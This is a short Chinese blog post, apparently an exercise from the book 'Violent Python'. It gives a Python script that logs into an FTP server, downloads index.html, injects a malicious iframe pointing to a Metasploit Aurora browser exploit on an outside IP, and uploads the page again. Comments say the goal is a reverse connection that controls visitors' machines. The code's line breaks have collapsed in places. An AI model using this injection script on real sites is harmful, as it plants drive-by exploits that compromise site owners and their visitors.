Violent Python FTP注入"/>
Violent Python FTP注入
# coding=UTF-8
# time: 18-1-5: 下午3:14
# Author: Xifeng2009
'''
在网页中加入恶意注入代码
找到网页文件后,必须用恶意重定向代码感染它们,
为了快速创建一个位于 :8080/exploit 的恶意服务器和页面,
我们将使用Metasploit框架, 选择ms10_002_aurora
10.10.10.112:8080/exploit 上的网页会利用被重定向到这里的浏览器中的漏洞,
使之向我们提供一个反向连接,令我们能通过这个反向链接来控制这台肉鸡
'''
import ftplib'''运行代码,下载index.html,并在其中注入恶意内容,并上传'''
def injectPage(ftp, page, redirect):f = open(page + '.tmp', 'w') # 下载FTP文件ftp.retrlines('RETR ' + page)print("[+] Downloaded Page: " + page)f.write(redirect) # 写入恶意代码f.close()print("[+] Injected Malicious IFrame on " + page)ftp.storlines('STOR ' + page, open(page + '.tmp', 'rb')) # 上传目标文件print("[+] Uploaded Injected Page: " + page)host = '127.0.0.1'
userName = 'uftp'
passWord = 'uftp'
ftp = ftplib.FTP(host)
ftp.login(userName, passWord)
redirect = "<iframe src='http://192.168.100.113:8080/exploit'></iframe>"
injectPage(ftp, 'index.html', redirect)
更多推荐
Violent Python FTP注入
发布评论